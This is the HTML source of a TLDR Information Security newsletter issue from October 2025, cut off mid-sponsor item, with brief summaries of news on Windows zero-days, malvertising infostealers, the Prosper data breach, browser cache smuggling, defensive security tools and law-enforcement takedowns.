<!DOCTYPE html><html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="x-apple-disable-message-reformatting">
<title>TLDR InfoSec</title>
<meta name="color-scheme" content="light dark">
<meta name="supported-color-schemes" content="light dark">
<style type="text/css">
:root {
color-scheme: light dark; supported-color-schemes: light dark;
}
*,
*:after,
*:before {
-webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box;
}
* {
-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;
}
html,
body,
.document {
width: 100% !important; height: 100% !important; margin: 0; padding: 0;
}
body {
-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-rendering: optimizeLegibility;
}
div[style*="margin: 16px 0"] {
margin: 0 !important;
}
table,
td {
mso-table-lspace: 0pt; mso-table-rspace: 0pt;
}
table {
border-spacing: 0; border-collapse: collapse; table-layout: fixed; margin: 0 auto;
}
img {
-ms-interpolation-mode: bicubic; max-width: 100%; border: 0;
}
*[x-apple-data-detectors] {
color: inherit !important; text-decoration: none !important;
}
.x-gmail-data-detectors,
.x-gmail-data-detectors *,
.aBn {
border-bottom: 0 !important; cursor: default !important;
}
.btn {
-webkit-transition: all 200ms ease; transition: all 200ms ease;
}
.btn:hover {
background-color: #f67575; border-color: #f67575;
}
* {
font-family: Arial, Helvetica, sans-serif; font-size: 18px;
}
@media screen and (max-width: 600px) {
.container {
width: 100%; margin: auto;
}
.stack {
display: block!important; width: 100%!important; max-width: 100%!important;
}
.btn {
display: block; width: 100%; text-align: center;
}
}
body,
p,
td,
tr,
.body,
table,
h1,
h2,
h3,
h4,
h5,
h6,
div,
span {
background-color: #FEFEFE !important; color: #010101 !important;
}
@media (prefers-color-scheme: dark) {
body,
p,
td,
tr,
.body,
table,
h1,
h2,
h3,
h4,
h5,
h6,
div,
span {
background-color: #27292D !important; color: #FEFEFE !important;
}
}
a {
color: inherit !important; text-decoration: underline !important;
}
</style>
<!--[if mso | ie]>
<style type="text/css">
a {
background-color: #FEFEFE !important; color: #010101 !important;
}
@media (prefers-color-scheme: dark) {
a {
background-color: #27292D !important; color: #FEFEFE !important;
}
}
</style>
<![endif]-->
</head>
<body class="">
<div style="display: none; max-height: 0px; overflow: hidden;">Hackers stole personal and financial details belonging to 17.6 million users of the Prosper lending platform, including Social Security numbers โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ </div>
<div style="display: none; max-height: 0px; overflow: hidden;">
<br>
</div>
<table align="center" class="document">
<tbody>
<tr>
<td valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" class="container" width="600">
<tbody>
<tr class="inner-body">
<td>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr class="header">
<td bgcolor="" class="container">
<table width="100%">
<tbody>
<tr>
<td class="container">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" style="margin-top: 0px;" width="100%">
<tbody>
<tr>
<td style="padding: 0px;">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div style="text-align: center;">
<span style="margin-right: 0px;"><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Ftldr.tech%2Finfosec%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Xq7hrlXvrmvD3nVWomt8tYomV5aBn31MVF986PuXIJY=427" rel="noopener noreferrer" target="_blank"><span>Sign Up</span></a>
|<span style="margin-right: 2px; margin-left: 2px;"><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fadvertise.tldr.tech%2F%3Futm_source=tldrinfosec%26utm_medium=newsletter%26utm_campaign=advertisetopnav/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/bQo4NLYoU-zTkiwd-HOKoUePlL1eTjJ11KLwdcvMy0Y=427" rel="noopener noreferrer" target="_blank"><span>Advertise</span></a></span>|<span style="margin-left: 2px;"><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fa.tldrnewsletter.com%2Fweb-version%3Fep=1%26lc=156924ca-84b7-11f0-8d58-47c5c04ad337%26p=dffbd6e8-ada1-11f0-aff1-39f1696b0a19%26pt=campaign%26t=1760965664%26s=aa01646dffc525c73454f6193a9734e2a993e1229e4f8c11c53bd40c1b989bca/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/a2eqNZthtvjfRLw145u-eCgRnVS1Ls4L6EnJvVJkmYE=427"><span>View Online</span></a></span>
<br>
</span></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="text-align: center;"><span data-darkreader-inline-color="" style="--darkreader-inline-color:#3db3ff; color: rgb(51, 175, 255) !important; font-size: 30px;">T</span><span style="font-size: 30px;"><span data-darkreader-inline-color="" style="color: rgb(232, 192, 96) !important; --darkreader-inline-color:#e8c163; font-size:30px;">L</span><span data-darkreader-inline-color="" style="color: rgb(101, 195, 173) !important; --darkreader-inline-color:#6ec7b2; font-size:30px;">D</span></span><span data-darkreader-inline-color="" style="--darkreader-inline-color:#dd6e6e; color: rgb(220, 107, 107) !important; font-size: 30px;">R</span>
<br>
</td>
</tr>
</tbody>
</table>
<br>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr id="together-with">
<td align="center" height="20" style="vertical-align:middle !important;" valign="middle" width="100%"><strong style="vertical-align:middle !important; height: 100%;">Together With </strong>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/wdXC9FTenz-nKCUOd8oHOm-mDIG0a5MgPkFlV9h-qI8=427"><img src="https://images.tldr.tech/rippling10201028.png" valign="middle" style="vertical-align: middle !important; height: 100%;" alt="Rippling"></a></td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width:100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;">
<div style="text-align: center;">
<h1><strong>TLDR Information Security <span id="date">2025-10-20</span></strong></h1>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width:100%;" width="100%">
<tbody>
<tr id="sponsy-copy">
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/2/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/jEo1sjnVdToL1EwOUmb2JdllPn80LKNBLlZEZFNwP6k=427">
<span>
<strong>Webinar: How growing companies can secure endpoints and devices for distributed workforces (Sponsor)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
As your company grows, you're forced to deal with more devices, more tools, and more complexity - often with the same limited resources.<p></p><p>This <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/3/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/BL4ydNnb_AixG6mNoX44XCoU3kOMF05vtew6fIQnbts=427" rel="noopener noreferrer nofollow" target="_blank"><span>Wednesday (10/22)</span></a>, <strong>Diana Health's</strong> Director of IT Jacob McGonigle, <strong>SentinelOne's</strong> Jay Ryerse, and <strong>Rippling IT</strong> GM Anique Drumright will share practical tips to simplify endpoint management and strengthen security. You'll learn how to:</p>
<ul>
<li>Gain complete visibility across distributed endpoints</li>
<li>Strengthen security without adding operational drag</li>
<li>Prove ROI on security investments to leadership</li>
</ul>
<p><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Frippling.registration.goldcast.io%2Fwebinar%2F9b867911-e70c-49e4-8f59-dc2ce0fa76e0%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=10%2F22%2Bdistributed%2Bdefense%2Bwebinar%26utm_content=webinar/4/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/cMzdCcWhcQwIil_ZmdiXyqhvf7y3cBfH8BTV8-K-GLc=427" rel="noopener noreferrer nofollow" target="_blank"><span>Register here โ</span></a></p>
<p>๐ก <strong>While you wait for Wednesday's webinar</strong>, check out <a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.rippling.com%2Fresources%2Fit-operations-survey-2025%3Futm_source=tldr%26utm_medium=newsletter%26utm_campaign=2025%2520it%2520ops%2520report%26utm_content=gated%2520content/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/dW5Bk-bvxCwOWqoJmRa6kA3jbWUvvEQWBRBwoGXj_CE=427" rel="noopener noreferrer nofollow" target="_blank"><span><strong>Rippling IT's 2025 IT Ops Report</strong></span></a>.
</p>
</span></span></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr bgcolor="">
<td class="container">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td style="padding: 0px;">
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">๐</span></div></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Attacks & Vulnerabilities</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fthehackernews.com%2F2025%2F10%2Ftwo-new-windows-zero-days-exploited-in.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/GEIydJo3nUmUmOHP7SKoGqI7YtezRzn7Xq_50U8JDX4=427">
<span>
<strong>Two New Windows Zero-Days Exploited in the Wild - One Affects Every Version Ever Shipped (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Microsoft fixed three actively exploited vulnerabilities as part of the final Patch Tuesday for Windows 10. One of the vulnerabilities is a secure boot bypass, whereas the other two are privilege escalation vulnerabilities. Notably, a vulnerable legacy modem driver could allow for privilege escalation in every version of Windows.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fgoogle-ads-for-fake-homebrew-logmein-sites-push-infostealers%2F%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/x0NbkXuFjjn4QHqR9KFCbCdahiNv286Qxa7tF5YM3hE=427">
<span>
<strong>Google Ads for Fake Homebrew, LogMeIn Sites Push Infostealers (2 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Researchers at threat hunting company Hunt.io have uncovered a new malware campaign that uses ClickFix tactics and impersonates popular software to distribute malware. The campaign uses Google Ads to impersonate software like Homebrew, LogMeIn, and TradingView and requests users to copy commands they run in Terminal. The malware then downloads either Odyssey or AMOS infostealers to harvest credentials.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.securityweek.com%2Fprosper-data-breach-impacts-17-6-million-accounts%2F%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/_EExM9WWQwaBRKw5WELrdXOnGhwAXLUPKXGp34Baw1c=427">
<span>
<strong>Prosper Data Breach Impacts 17.6 Million Accounts (2 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Hackers stole personal and financial details belonging to 17.6 million users of the Prosper lending platform, including Social Security numbers and government IDs. Prosper says attackers took data from its database but did not access accounts or funds.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">๐ง </span></div>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Strategies & Tactics</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fhackaday.com%2F2025%2F10%2F18%2Fhacking-a-banned-chinese-security-camera%2F%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/kt2nd0WkmjTYzMhpwdxlV8iLmcF-Fs3SNEVrBsnmYR0=427">
<span>
<strong>Hacking A Banned Chinese Security Camera (1 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
A security researcher successfully conducted man-in-the-middle attacks against a banned Chinese security camera, demonstrating that the device fails to verify certificate signing chains properly and transmits unencrypted video data over UDP. While these vulnerabilities are concerning, the real security issue driving the US ban is the camera's automatic firmware update capability, which could allow manufacturers to push malicious software updates in the future. The analysis highlights how even devices with multiple security flaws may pose their most significant risk through remote update mechanisms that users cannot control or audit.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.zerosalarium.com%2F2025%2F10%2Fdefenderwrite-abusing-whitelisted-programs-arbitrary-write.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Vm1k20FnYVsmoJQ7E5-jn_rC5Xc9w8wc853uczrqmiI=427">
<span>
<strong>DefenderWrite: Abusing Whitelisted Programs for Arbitrary Writes (4 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Antivirus folders typically block file writes to prevent attacks, but some whitelisted Windows programs can bypass these restrictions. DefenderWrite is a tool that identifies which executables can write files into protected antivirus folders without elevated privileges or exploits. By scanning all .exe files and testing their capabilities, the tool reveals weak points in Windows Defender and other major AVs, showing that even protected folders can be compromised for stealthy persistence.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fmedium.com%2F@dnem__%2Frevisiting-browser-cache-smuggling-1a8ab374d55e%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/u-rWLs4gkXk8vAwoQ-FQxIJw_mK6EbH-DKxWINF9_qM=427">
<span>
<strong>Revisiting Browser Cache Smuggling (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Browser cache smuggling is a technique that abuses how web browsers store files to sneak malicious code onto victims' systems. The method leverages browser caching to download files, then uses COM Hijacking (a way of loading malicious DLLs via Windows registry settings) to achieve persistent code execution each time the browser starts. Steganography is also used to hide additional payloads within cached images, making detection harder. By combining these approaches, attackers can reliably trigger their code from the browser cache without external downloads or easily detectable file changes, bypassing many modern endpoint protections and leaving few obvious traces.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">๐งโ๐ป</span></div>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Launches & Tools</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fsemgrep.dev%2Fresources%2Fsemgrep-vs-snyk%3Futm_source=tldr%26utm_medium=paidsocial/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/Nev0mGT98ue0EeIhrYhLnufCnag-YQJCPRRMC8bAYec=427">
<span>
<strong>Everyone promises to reduce AppSec alert noise. Here's how Semgrep actually achieves it (Sponsor)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
<strong>Semgrep's AI isn't just an API call to an LLM - it confidently handles around 60% of SAST triage for customers, with a 96% human-agree rate. This means security teams can spend all of their time on the issues that matter, without worrying that they've missed out on any real issues. </strong><a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fsemgrep.dev%2Fresources%2Fsemgrep-vs-snyk%3Futm_source=tldr%26utm_medium=paidsocial/2/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/mNi7p4BfqR_s0IUX-MmPpZvSgtZ5AqDQCIzwNnvAX4w=427" rel="noopener noreferrer nofollow" target="_blank"><span>See how Semgrep compares to competitors.</span></a>
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fgithub.com%2FPaloAltoNetworks%2FKIEMPossible%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/y0ZtCttdxIUpNJE_rWdLGKL0bIePovwOut9Dohn84Dk=427">
<span>
<strong>KIEMPossible (GitHub Repo)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
KIEMPossible is a Kubernetes Infrastructure Entitlement Management tool from Palo Alto Networks that provides visibility into permissions and their actual usage across clusters by analyzing RBAC configurations and audit logs from AWS EKS, Azure AKS, GCP GKE, and local Kubernetes environments. The tool flattens complex permission structures into granular entries, correlates them with audit logs to identify last usage timestamps, and stores the results in a MySQL database to help security teams enforce least privilege by identifying unused or risky permissions. It supports workload identity mapping and group inheritance tracking and generates reports on entities with dangerous unused permissions, making reducing attack surface without breaking legitimate access easier.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fgithub.com%2Fise-uiuc%2FKNighter%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/to_drwEyFkK0G_ezh2bSyKUIxjxiGSt7alf3ArCOf8c=427">
<span>
<strong>KNighter (GitHub Repo)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
KNighter is an automated static analysis tool from UIUC that uses Large Language Models to synthesize custom code checkers by learning from historical patch commits in C/C++ codebases like the Linux kernel. The tool employs a three-stage pipeline of generation, refinement, and triage to create LLVM-based checkers that identify bug patterns, focusing on finding real-world vulnerabilities in large-scale systems. It integrates with OpenAI, Claude, Google, and DeepSeek models to automatically generate static analysis rules from git commit history, enabling security teams to discover previously unknown bugs based on patterns from past fixes.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fgithub.com%2FFuzzingLabs%2Ffuzzforge_ai%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/1y7ADiRfPhvnl9ce_ZHeGrysAm9o86wadhSZZrgpwuc=427">
<span>
<strong>Fuzzforge AI (GitHub Repo)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
AI-powered workflow automation and AI Agents platform for AppSec, Fuzzing, and Offensive Security. Automate vulnerability discovery with intelligent fuzzing, AI-driven analysis, and a marketplace of security tools.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">๐</span></div></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><strong><h1>Miscellaneous</h1></strong></div>
</div>
</td>
</tr>
</tbody>
</table>
<table bgcolor="" style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fthehackernews.com%2F2025%2F10%2Feuropol-dismantles-sim-farm-network.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/WiRaQgEqwcxv6ihH6vb1kgrr1DW57UFFANkl48gOmi8=427">
<span>
<strong>Europol Dismantles SIM Farm Network Powering 49 Million Fake Accounts Worldwide (3 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Europol's Operation SIMCARTEL dismantled a sophisticated cybercrime-as-a-service platform that operated SIM farms with 40,000 active SIM cards, enabling the creation of over 49 million fake online accounts used for phishing, investment fraud, and other criminal activities. The operation resulted in seven arrests, seizure of 1,200 SIM box devices, takedown of two websites, and freezing of nearly โฌ700,000 in assets across multiple countries. Security professionals should monitor for SIM farm indicators in their threat detection systems and implement stronger verification processes that go beyond SMS-based authentication, as these operations demonstrate how easily criminals can bypass phone number verification on a massive scale.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fthehackernews.com%2F2025%2F10%2Fnorth-korean-hackers-combine-beavertail.html%3Futm_source=tldrinfosec/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/E6MsXd6uCDzOqAWz3DlyGmeLU0DM3A9pHRSl4WRzT0s=427">
<span>
<strong>North Korean Hackers Combine BeaverTail and OtterCookie into Advanced JS Malware (5 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
North Korean threat actors behind the Contagious Interview campaign have merged functionality from their BeaverTail and OtterCookie malware families, creating a more sophisticated JavaScript-based information stealer with enhanced keylogging, screenshot capture, and cryptocurrency wallet theft capabilities. The evolved malware uses legitimate npm packages and supply chain compromises to distribute through fake job interview processes, with new variants like OtterCandy combining remote access trojan functionality and utilizing blockchain-based command-and-control infrastructure via Ethereum and BNB Smart Chain. Security professionals should monitor for suspicious npm packages, implement stronger validation for job applicant technical assessments, and watch for the specific malware indicators, including the "node-nvm-ssh" package and associated file patterns used in these supply chain attacks.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Flinks.tldrnewsletter.com%2FtZEIcc/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/wamOyDd4_yrbdMDHlHxkZaxk_C2UkVvy9LUhwyLjxVU=427">
<span>
<strong>Vanilla Tempest's Rhysida ransomware attacks foiled (1 minute read)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
Microsoft dismantled an attack campaign by Vanilla Tempest (also called Vice Society), which used fake Microsoft Teams installers and over 200 fraudulent certificates to spread the Rhysida ransomware. The attackers used malicious ads and SEO techniques to lure users, delivering malware that enabled data theft and additional payload delivery.
</span>
</span>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;"><span style="font-size: 36px;">โก</span></div></div>
</td>
</tr>
</tbody>
</table>
<table align="center" bgcolor="" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding-top: 0px; padding-bottom: 0px;">
<div class="text-block">
<div style="text-align: center;">
<h1><strong>Quick Links</strong></h1>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table bgcolor="" style="table-layout: fixed; width: 100%;" width="100%">
<tbody>
<tr>
<td style="padding:0;border-collapse:collapse;border-spacing:0;margin:0;" valign="top">
<table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td class="container" style="padding: 15px 15px;">
<div class="text-block">
<span>
<a href="https://tracking.tldrnewsletter.com/CL0/https:%2F%2Fwww.intrusion.com%2Fintrusion-shield-cloud-for-aws-tldr%2F%3Futm_campaign=22505002-AWS_Launch_2025%26utm_source=TLDR%26utm_medium=102025/1/0100019a01bb9f64-452cd28b-0901-41fb-9cbc-0a5f5c25281a-000000/3bve8fykzG98iGs21F6tcnut433SKxbRSpyVGnzOHkk=427">
<span>
<strong>Stop managing firewall rules (Sponsor)</strong>
</span>
</a>
<br>
<br>
<span style="font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif;">
